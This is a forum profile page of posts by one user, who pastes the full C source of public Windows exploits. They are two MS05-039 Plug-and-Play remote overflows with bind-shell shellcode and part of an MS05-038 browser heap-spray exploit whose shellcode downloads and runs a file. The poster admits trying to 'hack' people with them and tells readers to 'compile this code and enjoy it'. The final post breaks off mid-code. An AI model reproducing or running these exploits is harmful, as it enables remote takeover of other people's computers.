st4r-s4t
-
Content Count
15 -
Joined
-
Last visited
Posts posted by st4r-s4t
-
-
-
OH..................... My speed is very low i can`t tell you thanks for any things
-
oh ok i am sory this is the new vuln of plug and play it`s name is:
MS Windows Plug-and-Play Service Remote Universal Exploit (MS05-039)
I Sorry because i`m iranian and ican`t speak English very good!!* Description:
* A remote code execution and local elevation of privilege
* vulnerability exists in Plug and Play that could allow an
* attacker who successfully exploited this vulnerability to take
* complete control of the affected system.
*
* This is a remote code execution and local privilege elevation
* vulnerability. On Windows 2000, an anonymous attacker could
* remotely try to exploit this vulnerability.
*
* On Windows XP Service Pack 1, only an authenticated user could
* remotely try to exploit this vulnerability.
* On Window XP Service Pack 2 and Windows Server 2003, only an
* administrator can remotely access the affected component.
* Therefore, on Windows XP Service Pack 2 and Windows Server 2003,
* this is strictly a local privilege elevation vulnerability.
* An anonymous user cannot remotely attempt to exploit this
* vulnerability on Windows XP Service Pack 2 and Windows
* Server 2003.
this is the other vuln of the plug and play ... and i compile it with lcc-win32 and it attack to port 445/tcp but until now i can`t hack any person with it:
other vuln of plug and play:
/* #define _WIN32 */#include <stdio.h>#include <stdlib.h>#include <string.h>#ifdef _WIN32#include <winsock2.h>#pragma comment(lib, "ws2_32")#else#include <sys/types.h>#include <netinet/in.h>#include <sys/socket.h>#include <netdb.h>#endifunsigned char SMB_Negotiate[] = "\x00\x00\x00\x85\xFF\x53\x4D\x42\x72\x00\x00\x00\x00\x18\x53\xC8" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE" "\x00\x00\x00\x00\x00\x62\x00\x02\x50\x43\x20\x4E\x45\x54\x57\x4F" "\x52\x4B\x20\x50\x52\x4F\x47\x52\x41\x4D\x20\x31\x2E\x30\x00\x02" "\x4C\x41\x4E\x4D\x41\x4E\x31\x2E\x30\x00\x02\x57\x69\x6E\x64\x6F" "\x77\x73\x20\x66\x6F\x72\x20\x57\x6F\x72\x6B\x67\x72\x6F\x75\x70" "\x73\x20\x33\x2E\x31\x61\x00\x02\x4C\x4D\x31\x2E\x32\x58\x30\x30" "\x32\x00\x02\x4C\x41\x4E\x4D\x41\x4E\x32\x2E\x31\x00\x02\x4E\x54" "\x20\x4C\x4D\x20\x30\x2E\x31\x32\x00";unsigned char SMB_SessionSetupAndX[] = "\x00\x00\x00\xA4\xFF\x53\x4D\x42\x73\x00\x00\x00\x00\x18\x07\xC8" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE" "\x00\x00\x10\x00\x0C\xFF\x00\xA4\x00\x04\x11\x0A\x00\x00\x00\x00" "\x00\x00\x00\x20\x00\x00\x00\x00\x00\xD4\x00\x00\x80\x69\x00\x4E" "\x54\x4C\x4D\x53\x53\x50\x00\x01\x00\x00\x00\x97\x82\x08\xE0\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00\x77\x00\x73\x00\x20\x00" "\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x32\x00\x31\x00\x39\x00" "\x35\x00\x00\x00\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00\x77\x00" "\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00\x35\x00" "\x2E\x00\x30\x00\x00\x00\x00\x00";unsigned char SMB_SessionSetupAndX2[] = "\x00\x00\x00\xDA\xFF\x53\x4D\x42\x73\x00\x00\x00\x00\x18\x07\xC8" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE" "\x00\x08\x20\x00\x0C\xFF\x00\xDA\x00\x04\x11\x0A\x00\x00\x00\x00" "\x00\x00\x00\x57\x00\x00\x00\x00\x00\xD4\x00\x00\x80\x9F\x00\x4E" "\x54\x4C\x4D\x53\x53\x50\x00\x03\x00\x00\x00\x01\x00\x01\x00\x46" "\x00\x00\x00\x00\x00\x00\x00\x47\x00\x00\x00\x00\x00\x00\x00\x40" "\x00\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x06\x00\x06\x00\x40" "\x00\x00\x00\x10\x00\x10\x00\x47\x00\x00\x00\x15\x8A\x88\xE0\x48" "\x00\x4F\x00\x44\x00\x00\xED\x41\x2C\x27\x86\x26\xD2\x59\xA0\xB3" "\x5E\xAA\x00\x88\x6F\xC5\x57\x00\x69\x00\x6E\x00\x64\x00\x6F\x00" "\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x30\x00\x20\x00" "\x32\x00\x31\x00\x39\x00\x35\x00\x00\x00\x57\x00\x69\x00\x6E\x00" "\x64\x00\x6F\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00" "\x30\x00\x20\x00\x35\x00\x2E\x00\x30\x00\x00\x00\x00\x00";unsigned char SMB_TreeConnectAndX[] = "\x00\x00\x00\x5A\xFF\x53\x4D\x42\x75\x00\x00\x00\x00\x18\x07\xC8" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFE" "\x00\x08\x30\x00\x04\xFF\x00\x5A\x00\x08\x00\x01\x00\x2F\x00\x00";unsigned char SMB_TreeConnectAndX_[] = "\x00\x00\x3F\x3F\x3F\x3F\x3F\x00";/* browser */unsigned char SMB_PipeRequest_browser[] = "\x00\x00\x00\x66\xFF\x53\x4D\x42\xA2\x00\x00\x00\x00\x18\x07\xC8" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x78\x04" "\x00\x08\x40\x00\x18\xFF\x00\xDE\xDE\x00\x10\x00\x16\x00\x00\x00" "\x00\x00\x00\x00\x9F\x01\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x40\x00\x00\x00" "\x02\x00\x00\x00\x03\x13\x00\x00\x5C\x00\x62\x00\x72\x00\x6F\x00" "\x77\x00\x73\x00\x65\x00\x72\x00\x00\x00";unsigned char SMB_PNPEndpoint[] =/* 8d9f4e40-a03d-11ce-8f69-08003e30051b v1.0: pnp */ "\x00\x00\x00\x9C\xFF\x53\x4D\x42\x25\x00\x00\x00\x00\x18\x07\xC8" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x78\x04" "\x00\x08\x50\x00\x10\x00\x00\x48\x00\x00\x00\x00\x10\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x54\x00\x48\x00\x54\x00\x02" "\x00\x26\x00\x00\x40\x59\x00\x00\x5C\x00\x50\x00\x49\x00\x50\x00" "\x45\x00\x5C\x00\x00\x00\x40\x00\x05\x00\x0B\x03\x10\x00\x00\x00" "\x48\x00\x00\x00\x01\x00\x00\x00\xB8\x10\xB8\x10\x00\x00\x00\x00" "\x01\x00\x00\x00\x00\x00\x01\x00\x40\x4E\x9F\x8D\x3D\xA0\xCE\x11" "\x8F\x69\x08\x00\x3E\x30\x05\x1B\x01\x00\x00\x00\x04\x5D\x88\x8A" "\xEB\x1C\xC9\x11\x9F\xE8\x08\x00\x2B\x10\x48\x60\x02\x00\x00\x00";unsigned char RPC_call[] = "\x00\x00\x08\x90\xFF\x53\x4D\x42\x25\x00\x00\x00\x00\x18\x07\xC8" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x78\x04" "\x00\x08\x60\x00\x10\x00\x00\x3C\x08\x00\x00\x00\x01\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x54\x00\x3C\x08\x54\x00\x02" "\x00\x26\x00\x00\x40\x4D\x08\x00\x5C\x00\x50\x00\x49\x00\x50\x00" "\x45\x00\x5C\x00\x00\x00\x40\x00\x05\x00\x00\x03\x10\x00\x00\x00" "\x3C\x08\x00\x00\x01\x00\x00\x00\x24\x08\x00\x00\x00\x00\x36\x00" "\x11\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x52\x00\x4F\x00" "\x4F\x00\x54\x00\x5C\x00\x53\x00\x59\x00\x53\x00\x54\x00\x45\x00" "\x4D\x00\x5C\x00\x30\x00\x30\x00\x30\x00\x30\x00\x00\x00\x00\x00" "\xFF\xFF\x00\x00\xE0\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" "\xC0\x07\x00\x00\x00\x00\x00\x00\x90\x90\x90\x90\x90\x90\x90\x90" "\xEB\x08\x90\x90\x67\x15\x7a\x76\xEB\x08\x90\x90\x67\x15\x7a\x76" "\xEB\x08\x90\x90\x67\x15\x7a\x76\xEB\x08\x90\x90\x67\x15\x7a\x76" "\xEB\x08\x90\x90\x67\x15\x7a\x76\xEB\x08\x90\x90\x67\x15\x7a\x76" "\xEB\x08\x90\x90\x67\x15\x7a\x76\xEB\x08\x90\x90\x67\x15\x7a\x76" /* jmp over - entry point */ "\xEB\x08\x90\x90" /* pop reg; pop reg; retn; - umpnpmgr.dll */ "\x67\x15\x7a\x76" /* 0x767a1567 */ /* jmp ebx - umpnpmgr.dll "\x6f\x36\x7a\x76" */ "\xEB\x08\x90\x90\x67\x15\x7a\x76" "\x90\x90\x90\x90\x90\x90\x90\xEB\x08\x90\x90\x48\x4F\x44\x88\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";unsigned char RPC_call_end[] = "\xE0\x07\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00";unsigned char bind_shellcode[] = "\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x19" "\xf5\x04\x37\x83\xeb\xfc\xe2\xf4\xe5\x9f\xef\x7a\xf1\x0c\xfb\xc8" "\xe6\x95\x8f\x5b\x3d\xd1\x8f\x72\x25\x7e\x78\x32\x61\xf4\xeb\xbc" "\x56\xed\x8f\x68\x39\xf4\xef\x7e\x92\xc1\x8f\x36\xf7\xc4\xc4\xae" "\xb5\x71\xc4\x43\x1e\x34\xce\x3a\x18\x37\xef\xc3\x22\xa1\x20\x1f" "\x6c\x10\x8f\x68\x3d\xf4\xef\x51\x92\xf9\x4f\xbc\x46\xe9\x05\xdc" "\x1a\xd9\x8f\xbe\x75\xd1\x18\x56\xda\xc4\xdf\x53\x92\xb6\x34\xbc" "\x59\xf9\x8f\x47\x05\x58\x8f\x77\x11\xab\x6c\xb9\x57\xfb\xe8\x67" "\xe6\x23\x62\x64\x7f\x9d\x37\x05\x71\x82\x77\x05\x46\xa1\xfb\xe7" "\x71\x3e\xe9\xcb\x22\xa5\xfb\xe1\x46\x7c\xe1\x51\x98\x18\x0c\x35" "\x4c\x9f\x06\xc8\xc9\x9d\xdd\x3e\xec\x58\x53\xc8\xcf\xa6\x57\x64" "\x4a\xa6\x47\x64\x5a\xa6\xfb\xe7\x7f\x9d\x1a\x55\x7f\xa6\x8d\xd6" "\x8c\x9d\xa0\x2d\x69\x32\x53\xc8\xcf\x9f\x14\x66\x4c\x0a\xd4\x5f" "\xbd\x58\x2a\xde\x4e\x0a\xd2\x64\x4c\x0a\xd4\x5f\xfc\xbc\x82\x7e" "\x4e\x0a\xd2\x67\x4d\xa1\x51\xc8\xc9\x66\x6c\xd0\x60\x33\x7d\x60" "\xe6\x23\x51\xc8\xc9\x93\x6e\x53\x7f\x9d\x67\x5a\x90\x10\x6e\x67" "\x40\xdc\xc8\xbe\xfe\x9f\x40\xbe\xfb\xc4\xc4\xc4\xb3\x0b\x46\x1a" "\xe7\xb7\x28\xa4\x94\x8f\x3c\x9c\xb2\x5e\x6c\x45\xe7\x46\x12\xc8" "\x6c\xb1\xfb\xe1\x42\xa2\x56\x66\x48\xa4\x6e\x36\x48\xa4\x51\x66" "\xe6\x25\x6c\x9a\xc0\xf0\xca\x64\xe6\x23\x6e\xc8\xe6\xc2\xfb\xe7" "\x92\xa2\xf8\xb4\xdd\x91\xfb\xe1\x4b\x0a\xd4\x5f\xf6\x3b\xe4\x57" "\x4a\x0a\xd2\xc8\xc9\xf5\x04\x37";#define SET_PORTBIND_PORT(buf, port) \ *(unsigned short *)(((buf)+186)) = (port)voidconvert_name(char *out, char *name){ unsigned long len; len = strlen(name); out += len * 2 - 1; while (len--) { *out-- = '\x00'; *out-- = name[len]; }}intmain (int argc, char **argv){ struct sockaddr_in addr; struct hostent *he; int len; int sockfd; unsigned short smblen; unsigned short bindport; unsigned char tmp[1024]; unsigned char packet[4096]; unsigned char *ptr; char recvbuf[4096];#ifdef _WIN32 WSADATA wsa; WSAStartup(MAKEWORD(2,0), &wsa);#endif printf("\n (MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow\n"); printf("\t Universal Exploit + no crash shellcode\n\n\n"); printf("\t Copyright © 2005 .: houseofdabus :.\n\n\n"); if (argc < 3) { printf("%s <host> <bind port>\n", argv[0]); exit(0); } if ((he = gethostbyname(argv[1])) == NULL) { printf("[-] Unable to resolve %s\n", argv[1]); exit(0); } if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) { printf("[-] socket failed\n"); exit(0); } addr.sin_family = AF_INET; addr.sin_port = htons(445); addr.sin_addr = *((struct in_addr *)he->h_addr); memset(&(addr.sin_zero), '\0', 8); printf("\n[*] connecting to %s:445...", argv[1]); if (connect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) { printf("\n[-] connect failed\n"); exit(0); } printf("ok\n"); printf("[*] null session..."); if (send(sockfd, SMB_Negotiate, sizeof(SMB_Negotiate)-1, 0) < 0) { printf("\n[-] send failed\n"); exit(0); } len = recv(sockfd, recvbuf, 4096, 0); if ((len <= 10) || (recvbuf[9] != 0)) { printf("\n[-] failed\n"); exit(0); } if (send(sockfd, SMB_SessionSetupAndX, sizeof(SMB_SessionSetupAndX)-1, 0) < 0) { printf("\n[-] send failed\n"); exit(0); } len = recv(sockfd, recvbuf, 4096, 0); if (len <= 10) { printf("\n[-] failed\n"); exit(0); } if (send(sockfd, SMB_SessionSetupAndX2, sizeof(SMB_SessionSetupAndX2)-1, 0) < 0) { printf("\n[-] send failed\n"); exit(0); } len = recv(sockfd, recvbuf, 4096, 0); if ((len <= 10) || (recvbuf[9] != 0)) { printf("\n[-] failed\n"); exit(0); } ptr = packet; memcpy(ptr, SMB_TreeConnectAndX, sizeof(SMB_TreeConnectAndX)-1); ptr += sizeof(SMB_TreeConnectAndX)-1; sprintf(tmp, "\\\\%s\\IPC$", argv[1]); convert_name(ptr, tmp); smblen = strlen(tmp)*2; ptr += smblen; smblen += 9; memcpy(packet + sizeof(SMB_TreeConnectAndX)-1-3, &smblen, 1); memcpy(ptr, SMB_TreeConnectAndX_, sizeof(SMB_TreeConnectAndX_)-1); ptr += sizeof(SMB_TreeConnectAndX_)-1; smblen = ptr-packet; smblen -= 4; memcpy(packet+3, &smblen, 1); if (send(sockfd, packet, ptr-packet, 0) < 0) { printf("\n[-] send failed\n"); exit(0); } len = recv(sockfd, recvbuf, 4096, 0); if ((len <= 10) || (recvbuf[9] != 0)) { printf("\n[-] failed\n"); exit(0); } printf("ok\n"); printf("[*] bind pipe..."); if (send(sockfd, SMB_PipeRequest_browser, sizeof(SMB_PipeRequest_browser)-1, 0) < 0) { printf("\n[-] send failed\n"); exit(0); } len = recv(sockfd, recvbuf, 4096, 0); if ((len <= 10) || (recvbuf[9] != 0)) { printf("\n[-] failed\n"); exit(0); } if (send(sockfd, SMB_PNPEndpoint, sizeof(SMB_PNPEndpoint)-1, 0) < 0) { printf("\n[-] send failed\n"); exit(0); } len = recv(sockfd, recvbuf, 4096, 0); if ((len <= 10) || (recvbuf[9] != 0)) { printf("\n[-] failed\n"); exit(0); } printf("ok\n"); printf("[*] sending crafted packet..."); // nop ptr = packet; memset(packet, '\x90', sizeof(packet)); // header & offsets memcpy(ptr, RPC_call, sizeof(RPC_call)-1); ptr += sizeof(RPC_call)-1; // shellcode bindport = (unsigned short)atoi(argv[2]); bindport ^= 0x0437; SET_PORTBIND_PORT(bind_shellcode, htons(bindport)); memcpy(ptr, bind_shellcode, sizeof(bind_shellcode)-1); // end of packet memcpy( packet + 2196 - sizeof(RPC_call_end)-1 + 2, RPC_call_end, sizeof(RPC_call_end)-1); // sending... if (send(sockfd, packet, 2196, 0) < 0) { printf("\n[-] send failed\n"); exit(0); } printf("ok\n"); printf("[*] check your shell on %s:%i\n", argv[1], atoi(argv[2])); recv(sockfd, recvbuf, 4096, 0);return 0;}
and some info about it:
* ---------------------------------------------------------------------
* Solution:
* http://www.microsoft.com/err/technet/security/
*
* ---------------------------------------------------------------------
* Systems Affected:
* - Windows Server 2003, SP1
* - Windows XP SP1, SP2
* - Windows 2000 SP4
*
* ---------------------------------------------------------------------
* Tested on:
* - Windows 2000 SP4
*
* ---------------------------------------------------------------------
* Compile:
*
* Win32/VC++ : cl -o HOD-ms05039-pnp-expl HOD-ms05039-pnp-expl.c
* Win32/cygwin: gcc -o HOD-ms05039-pnp-expl HOD-ms05039-pnp-expl.c
* Linux : gcc -o HOD-ms05039-pnp-expl HOD-ms05039-pnp-expl.c
*
* ---------------------------------------------------------------------
* Example:
*
* C:\>HOD-ms05039-pnp-expl 192.168.0.1 7777
*
* [*] connecting to 192.168.0.22:445...ok
* [*] null session...ok
* [*] bind pipe...ok
* [*] sending crafted packet...ok
* [*] check your shell on 192.168.0.1:7777
* Ctrl+C
*
* C:\>nc 192.168.0.1 7777
*
* Microsoft Windows 2000 [Version 5.00.2195]
* © Copyright 1985-2000 Microsoft Corp.
*
* C:\WINNT\system32>
*
* ---------------------------------------------------------------------.
I HOPE FOR ...
by
Notice from BuffaloHELP:Whenever you copy and paste from another souce you must place QUOTE tags. Source http://imp.ovh.net/fr/ Credit adjusted.Notice from Klass:User warned as verbal warn was given prior. Also next time you post Long Code use[codebox] [/codebox]
tags -
This is the c code you can compile it with lcc win 32 or gcc or virtual c++ ...
/*Windows 2000 universal exploit for MS05-039-\x6d\x35\x6c\x30\x6e\x6e\x79-*/#define WIN32_LEAN_AND_MEAN#include <windows.h>#include <winnetwk.h>#include <winsock.h>#include <Rpc.h>#include <wchar.h>#include <stdio.h>#include <stdlib.h>#pragma comment(lib, "mpr")#pragma comment(lib, "Rpcrt4")BYTE Data1[0x68] ={0x11,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x11,0x00,0x00,0x00, 0x52,0x00,0x4F,0x00,0x4F,0x00,0x54,0x00,0x5C,0x00,0x53,0x00, 0x59,0x00,0x53,0x00,0x54,0x00,0x45,0x00,0x4D,0x00,0x5C,0x00, 0x30,0x00,0x30,0x00,0x30,0x00,0x30,0x00,0x00,0x00,0x00,0x00, 0xFF,0xFF,0x00,0x00,0x21,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0xEE,0xEE,0xEE,0xEE,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00, 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x21,0x00,0x00,0x00, 0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x00};struct DataStruct1{ BYTE SomeString[0x30]; DWORD RESDataType; DWORD LFD; DWORD SDM1; DWORD SDO; DWORD SDL; DWORD SDM2; BYTE SDA[0x07D0]; DWORD LRD; DWORD MB; DWORD DM;};struct RPCBIND{ BYTE VerMaj; BYTE VerMin; BYTE PacketType; BYTE PacketFlags; DWORD DataRep; WORD FragLength; WORD AuthLength; DWORD CallID; WORD MaxXmitFrag; WORD MaxRecvFrag; DWORD AssocGroup; BYTE NumCtxItems; WORD ContextID; WORD NumTransItems; GUID InterfaceUUID; WORD InterfaceVerMaj; WORD InterfaceVerMin; GUID TransferSyntax; DWORD SyntaxVer;};//from metasploit, before you were bornBYTE BindShell[374]={"\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45\x3c""\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x32""\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74\x07""\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a\x24""\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8""\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59\x64""\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68\x8e""\x4e\x0e\xec\xff\xd6\x89\xc7\x81\xec\x00\x01\x00\x00\x57\x56\x53""\x89\xe5\xe8\x27\x00\x00\x00\x90\x01\x00\x00\xb6\x19\x18\xe7\xa4""\x19\x70\xe9\xe5\x49\x86\x49\xa4\x1a\x70\xc7\xa4\xad\x2e\xe9\xd9""\x09\xf5\xad\xcb\xed\xfc\x3b\x57\x53\x32\x5f\x33\x32\x00\x5b\x8d""\x4b\x20\x51\xff\xd7\x89\xdf\x89\xc3\x8d\x75\x14\x6a\x07\x59\x51""\x53\xff\x34\x8f\xff\x55\x04\x59\x89\x04\x8e\xe2\xf2\x2b\x27\x54""\xff\x37\xff\x55\x30\x31\xc0\x50\x50\x50\x50\x40\x50\x40\x50\xff""\x55\x2c\x89\xc7\x31\xdb\x53\x53\x68\x02\x00\x22\x11\x89\xe0\x6a""\x10\x50\x57\xff\x55\x24\x53\x57\xff\x55\x28\x53\x54\x57\xff\x55""\x20\x89\xc7\x68\x43\x4d\x44\x00\x89\xe3\x87\xfa\x31\xc0\x8d\x7c""\x24\xac\x6a\x15\x59\xf3\xab\x87\xfa\x83\xec\x54\xc6\x44\x24\x10""\x44\x66\xc7\x44\x24\x3c\x01\x01\x89\x7c\x24\x48\x89\x7c\x24\x4c""\x89\x7c\x24\x50\x8d\x44\x24\x10\x54\x50\x51\x51\x51\x41\x51\x49""\x51\x51\x53\x51\xff\x75\x00\x68\x72\xfe\xb3\x16\xff\x55\x04\xff""\xd0\x89\xe6\xff\x75\x00\x68\xad\xd9\x05\xce\xff\x55\x04\x89\xc3""\x6a\xff\xff\x36\xff\xd3\xff\x75\x00\x68\x7e\xd8\xe2\x73\xff\x55""\x04\x31\xdb\x53\xff\xd0"};BYTE PRPC[0x48] ={0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x01,0x00,0x00,0x00, 0xB8,0x10,0xB8,0x10,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x01,0x00, 0x6A,0x28,0x19,0x39,0x0C,0xB1,0xD0,0x11,0x9B,0xA8,0x00,0xC0,0x4F,0xD9,0x2E,0xF5, 0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00, 0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};struct RPCFUNC{ BYTE VerMaj; BYTE VerMin; BYTE PacketType; BYTE PacketFlags; DWORD DataRep; WORD FragLength; WORD AuthLength; DWORD CallID; DWORD AllocHint; WORD ContextID; WORD Opnum;};BYTE POP[0x27] ={0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xAC,0x10,0x00,0x00,0x01,0x00,0x00,0x00, 0x94,0x10,0x00,0x00,0x00,0x00,0x09,0x00,0x05,0x08,0x00,0x00,0x00,0x00,0x00,0x00, 0x05,0x08,0x00,0x00,0x41,0x00,0x41};int BindRpcInterface(HANDLE PH, char *Interface, char *InterfaceVer){ BYTE rbuf[0x1000]; DWORD dw; struct RPCBIND RPCBind; memcpy(&RPCBind,&PRPC,sizeof(RPCBind)); UuidFromString(Interface,&RPCBind.InterfaceUUID); UuidToString(&RPCBind.InterfaceUUID,&Interface); RPCBind.InterfaceVerMaj=atoi(&InterfaceVer[0]); RPCBind.InterfaceVerMin=atoi(&InterfaceVer[2]); TransactNamedPipe(PH, &RPCBind, sizeof(RPCBind), rbuf, sizeof(rbuf), &dw, NULL); return 0;}int Attack(HANDLE PipeHandle){ struct RPCFUNC RPCOP; int bwritten=0; BYTE *LargeBuffer; BYTE rbuf[0x100]; DWORD dw; struct DataStruct1 EvilRPC; memcpy(&EvilRPC,&Data1,sizeof(EvilRPC)); EvilRPC.SDL=0x07C0; memset(EvilRPC.SDA,0x90,0x07D0); EvilRPC.SDA[76]=0x3e; EvilRPC.SDA[77]=0x1e; EvilRPC.SDA[78]=0x02; EvilRPC.SDA[79]=0x75; memset(EvilRPC.SDA+80,0x90,10); EvilRPC.SDA[90]=0x90; memcpy(EvilRPC.SDA+94,BindShell,374); EvilRPC.MB=0x00000004; EvilRPC.DM=0x00000000; EvilRPC.LFD=0x000007E0; EvilRPC.LRD=0x000007E0; memcpy(&RPCOP,&POP,sizeof(RPCOP)); RPCOP.Opnum = 54; RPCOP.FragLength=sizeof(RPCOP)+sizeof(EvilRPC); RPCOP.AllocHint=sizeof(EvilRPC); LargeBuffer=malloc(sizeof(RPCOP)+sizeof(EvilRPC)); memset(LargeBuffer,0x00,sizeof(RPCOP)+sizeof(EvilRPC)); memcpy(LargeBuffer,&RPCOP,sizeof(RPCOP)); memcpy(LargeBuffer+sizeof(RPCOP),&EvilRPC,sizeof(EvilRPC)); printf("Sending payload...\nThis has to time out... ctrl+c after 5 secs\ncheck for shell on port 8721"); TransactNamedPipe(PipeHandle, LargeBuffer, sizeof(RPCOP)+sizeof(EvilRPC), rbuf, sizeof(rbuf), &dw, NULL); free(LargeBuffer); return 0;}int main(int argc, char* argv[]){ char *server; NETRESOURCE nr; char unc[MAX_PATH]; char szPipe[MAX_PATH]; HANDLE hFile; if (argc < 2) { printf("Usage: %s <host>\n", argv[0]); return 1; } server=argv[1]; _snprintf(unc, sizeof(unc), "\\\\%s\\pipe", server); unc[sizeof(unc)-1] = 0; nr.dwType = RESOURCETYPE_ANY; nr.lpLocalName = NULL; nr.lpRemoteName = unc; nr.lpProvider = NULL; WNetAddConnection2(&nr, "", "", 0); _snprintf(szPipe, sizeof(szPipe), "\\\\%s\\pipe\\browser",server); hFile = CreateFile(szPipe, GENERIC_READ|GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL); BindRpcInterface(hFile,"8d9f4e40-a03d-11ce-8f69-08003e30051b","1.0"); //SendMalformed RPC request Attack(hFile); return 0;}
Notice from snlildude87:Credits adjusted.Remember to preview posts before posting to avoid something like this in the futureNotice from cmatcmextra:[-codebox-] tags used instead. Should shorten the page size up ... a bit -
You can compile this code and enjoy it!!
/*+++++++++++++++++++++++++++++++++++++++++++++++ Ms05 038 exploit POC Write By ZwelL 2005 8 11 http://http://www.donews.com/404.html zwell@sohu.comSome code belongs to Lion(cnhonker), regards to him.This code tested on Windows 2003-----------------------------------------------*/#include <stdio.h>#include <winsock2.h>#pragma comment(lib, "ws2_32")// Use for find the ASM code#define PROC_BEGIN __asm _emit 0x90 __asm _emit 0x90\ __asm _emit 0x90 __asm _emit 0x90\ __asm _emit 0x90 __asm _emit 0x90\ __asm _emit 0x90 __asm _emit 0x90#define PROC_END PROC_BEGIN#define SEARCH_STR "\x90\x90\x90\x90\x90\x90\x90\x90\x90"#define SEARCH_LEN 8#define MAX_SC_LEN 2048#define HASH_KEY 13// Define Decode Parameter#define DECODE_LEN 21#define SC_LEN_OFFSET 7#define ENC_KEY_OFFSET 11#define ENC_KEY 0xff// Define Function Addr#define ADDR_LoadLibraryA [esi]#define ADDR_GetSystemDirectoryA [esi+4]#define ADDR_WinExec [esi+8]#define ADDR_ExitProcess [esi+12]#define ADDR_URLDownloadToFileA [esi+16]// Need functionsunsigned char functions[100][128] ={ // [esi] stack layout // kernel32 4 // 00 kernel32.dll {"LoadLibraryA"}, // [esi] {"GetSystemDirectoryA"}, // [esi+4] {"WinExec"}, // [esi+8] {"ExitProcess"}, // [esi+12] // urlmon 1 // 01 urlmon.dll {"URLDownloadToFileA"}, // [esi+16] {""},};// Shellcode stringunsigned char sc[1024] = {0};unsigned int Sc_len;char *htmlbody1="<html><body>\r\n""<script language=\"javascript\">\r\n""shellcode = unescape(\"%u4343%u4343\"+\"";char *htmlbody2="\");\r\n""bigblock = unescape(\"%u0D0D%u0D0D\");\r\n""headersize = 20;\r\n""slackspace = headersize+shellcode.length;\r\n""while (bigblock.length<slackspace) bigblock+=bigblock;\r\n""fillblock = bigblock.substring(0, slackspace);\r\n""block = bigblock.substring(0, bigblock.length-slackspace);\r\n""while(block.length+slackspace<0x40000) block = block+block+fillblock;\r\n""memory = new Array();\r\n""for (i=0;i<750;i++) memory[i] = block + shellcode;\r\n""</SCRIPT>\r\n""<object classid=\"CLSID:083863F1-70DE-11d0-BD40-00A0C911CE86\"></object>\r\n""Ms05038 Exploit POC<br>\r\n""Made By ZwelL< http://http://www.donews.com/404.html ASM shellcode main functionvoid ShellCode();// Get function hashstatic DWORD __stdcall GetHash ( char *c ){ DWORD h = 0; while ( *c ) { __asm ror h, HASH_KEY h += *c++; } return( h );}int buildfile(unsigned char *sc, int len){ int i; char writebuf[4096]; char tmp[4096]; FILE *stream; memset(tmp, 0, 4096); memset(writebuf, 0, 4096); for(i = 0; i < len; i++) { sprintf(writebuf, "%s%.2x", writebuf, sc[i] & 0xff); } if(strlen(writebuf)%4!=0) strcat(writebuf, "00"); for(i=0; i<(strlen(writebuf)/4); i++) { strcat(tmp, "\%u"); strncat(tmp, &writebuf[i*4+2], 2); strncat(tmp, &writebuf[i*4], 2); } //printf("%s\n", writebuf); //printf("======================\n%s\n", tmp); if( (stream = fopen( "zwell_ms05038.html", "w+b" )) != 